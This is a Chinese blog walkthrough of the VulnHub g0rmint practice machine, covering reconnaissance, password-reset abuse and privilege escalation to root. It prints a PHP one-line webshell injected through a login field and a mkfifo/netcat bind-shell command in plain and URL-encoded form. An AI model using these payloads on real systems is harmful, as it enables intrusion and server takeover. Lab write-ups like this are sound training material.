渗透测试靶场练习(二)之g0rmint

最新推荐文章于 2024-05-22 20:01:38 发布
最新推荐文章于 2024-05-22 20:01:38 发布
阅读量890 收藏
点赞数
分类专栏: 渗透测试 文章标签: vulnhub g0rmint 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44479297/article/details/89154568
版权

渗透测试之g0rmint

信息搜集

  • arp-scan扫描
    在这里插入图片描述
  • 查找到IP为192.168.24.131的主机为靶机
  • 主机探测
    在这里插入图片描述
  • 发现有22端口和web的80端口,扫描网站目录获得robots.txt
    在这里插入图片描述
  • 打开robots.txt发现/g0rmint/路径,打开是一个登陆界面,在源码中发现备份文件
    在这里插入图片描述
  • 打开发现文件不存在,应该是在这个目录下,使用dirb扫描发现info.php,打开提示有backup.zip文件,成功下载,得到网站源码
  • 分析login.php
    在这里插入图片描述
  • 明显可以看到注册失败时,将email存入日志,dump.php文件是检查session的,当登录不成功时依然跳转到login.php界面,所以我们还是成功登录才行。
    在这里插入图片描述
  • 查看reset.php,发现使用email和用户名重置密码后,可以通过时间计算出密码
    在这里插入图片描述
  • 从哪里得到用户名呢,通过全局搜索email可以在style.css中发现作者的信息
    在这里插入图片描述
  • 重置密码后页面显示时间,使用PHP在线运行工具计算得出重置后的密码,成功登陆。
    在这里插入图片描述
  • 接下来要开始写入webshell了,在登陆界面中email填为一句话木马
<?php eval($_POST[_]); ?>
  • 写入webshell后记下时间,注意格式
  • 使用正确的email和密码登陆后访问一句话木马
    在这里插入图片描述
  • 然后可以反弹shell回本地,使用反弹shell命令:

_=mkfifo /tmp/t;
_=cat /tmp/t | /bin/sh -i 2>&1 | nc -l 8888 > /tmp/t;

  • 注意要上传URL编码后的命令

_=%60mkfifo%20%2ftmp%2ft%60%3B
_=%60cat%20%2ftmp%2ft%20%7C%20%2fbin%2fsh%20-i%202%3E%261%20%7C%20nc%20-l%208888%20%3E%20%2ftmp%2ft%60%3B

  • 第二个命令执行后浏览器会进入阻塞状态,等待外部连接,执行外部连接传入的命令,相当于一个ssh
  • 在本地使用连接命令

nc -n 192.168.24.131 8888

  • 可以得到一个命令执行环境
    在这里插入图片描述
  • 拿到shell后只是得到了www-data的权限,要接着提权
  • 查看系统版本号
    在这里插入图片描述
    在Kali中查找适用的提权脚本
    在这里插入图片描述
    在这里插入图片描述
  • 根据系统内核版本,选择44298.c进行提权
  • 由于靶机上没有GCC环境,在本地相同版本的Ubuntu编译后上传到靶机上执行
    在这里插入图片描述
  • 可以看到成功提权得到root权限,成功查找到flag文件。
    在这里插入图片描述
不断积淀
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
常见渗透测试靶场学习笔记
weixin_34220834的博客
04-24 2532
1.DVWA   作为新手,通常第一个听说的靶场应该就是DVWA,部署简单安装完对应版本的PAM(PHP-Apache-MySQL),简单配置后就可以使用。   1、DVWA靶场可测试漏洞:暴力破解(Brute Force)、命令注入(CommandInjection)、跨站请求伪造(CSRF)、文件包含(File Inclusion)、文件上传(File Upload)、不安全的验证码(I...
靶机渗透(十)g0rmint
qq_42180996的博客
05-22 1464
靶机g0rmint 一、实验环境 、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) ()Web渗透 1.浏览web网页(80端口) 2.目录扫描(dirb) 3.访问/robots.txt 4.代码审计 5.重置密码 6....
g0rmint 靶机渗透
weixin_44769042的博客
10-12 270
靶机记录--2 主机发现 nmap -sn 网段 端口扫描 扫到个22,80 先去web端 结果主页直接404 扫下目录吧 就这俩个正常 web渗透 访问一下robots里的目录 自动跳转了一个登录页面 忘记密码找回页面 随便试了几下没什么反应 F12来看看登录页 在这发现了一个叫做备份目录的路径 访问一下结果404了 试试再扫一下这里的目录,,因为从g0rmint目录开始,都是在robots里新找到的,再扫一遍可能有情况 .
渗透测试练习靶场汇总
2401_84215240的博客
05-22 1328
Vulfocus 官网:在线演示:2.BUUCTF在线评测writeup文章:https://github.com/niudaii/my-vulstack-wphttps: //接下来我将给各位同学划分一张学习计划表!
Web渗透漏洞靶场收集
qq_53058639的博客
03-13 2670
没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。想学好Web安全,咱首先得先弄清web是怎么搭建的,知道它的构造才能精准打击。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。Web安全入门必刷的靶场,包含了最常见的web漏洞,界面简单易用,通过设置不同的难度,可更好地理解漏洞的原理及对应的代码防护。
常用渗透测试靶场
山己见的博客
11-25 5342
1 DVWA 推荐新手首选靶场,配置简单,需下载phpstudy和靶场文件包,简单部署之后即可访问。 包含了常见的web漏洞(php的),每个漏洞分为四个等级,每个等级都有源码查看,最高等级的源码是最安全的。 DVWA靶场源码下载:http://www.dvwa.co.uk/index.php phpstudy官方下载:https://m.xp.cn/ 2 网络安全实验室 做题的靶场,也是一个基础靶场,是一个在线的靶场。 地址:http://hackinglab.cn/ 3 sqli-labs sqli-l
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 8068
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
渗透测试经典靶场学习-DVWA练习.
07-02
渗透测试经典靶场学习-DVWA练习.
渗透练习-XVWA渗透测试靶场
01-26
Xtreme Vulnerable Web Application (XVWA)是一款使用PHP/MySQL编写的靶场,可以帮助初学者快速学习安全姿势巩固渗透测试知识。建议将这个靶场部署在本地服务器来提升你的能力。 指令:XVWA采用一站式安装,你可以在...
Web漏洞渗透测试靶场(请勿在生产环境搭建)
最新发布
06-28
【作品名称】:Web漏洞渗透测试靶场 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】: Web漏洞渗透测试靶场 安装方法...
Web漏洞渗透测试靶场.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
内网渗透之CFS三层靶场渗透
yc11223344的博客
12-19 976
1.在连接target2的时候代理总是断开,反弹不了shell,后来重新启动msf,重新配置,最终获得了shell2.proxychains4使用不了sqlmap,不清楚什么原因。
靶机9 DC-8(过程超详细)
honest_gg的博客
09-26 2103
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场
靶场设计和渗透】
qq_55213436的博客
04-17 1176
为了深入贯彻学习网络安全法律法规,深入学习渗透测试知识,强化实战技能............编不出来了,反正今天的主题就是设计一个靶场然后渗透一遍。
完整的渗透测试靶场通关
NZXHJ的博客
07-15 2489
记录一次比较系统的内网渗透靶场通关的文章
自主搭建的三层网络域渗透靶场打靶记录
Innocence_0的博客
08-01 776
假期马上结束了,闲暇之时我自己尝试着搭建了一个内网渗透的靶场靶场是根据比较新的漏洞进行搭建的,质量自以为还可以。文中若有不当之处还请各位大佬多多点评公众号:WHOAMIAnony整个靶场的网络环境分为三层。从最初的信息收集、外网初探、攻入内网、搭建代理,横向移动,最终拿下域控。端口扫描端口服务识别漏洞搜索与利用Laravel Debug mode RCE(CVE-2021-3129)漏洞利用Docker逃逸通达OA v11.3 漏洞利用Linux环境变量提权Redis 未授权访问漏洞。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-07 2417
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
web渗透测试靶场cms
09-06
你可以尝试一些知名的Web渗透测试靶场CMS,如DVWA(Damn Vulnerable Web Application)、OWASP Juice Shop和WebGoat。这些靶场CMS都是为了帮助安全专业人员和开发者学习和实践Web渗透测试技术而设计的,它们提供了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值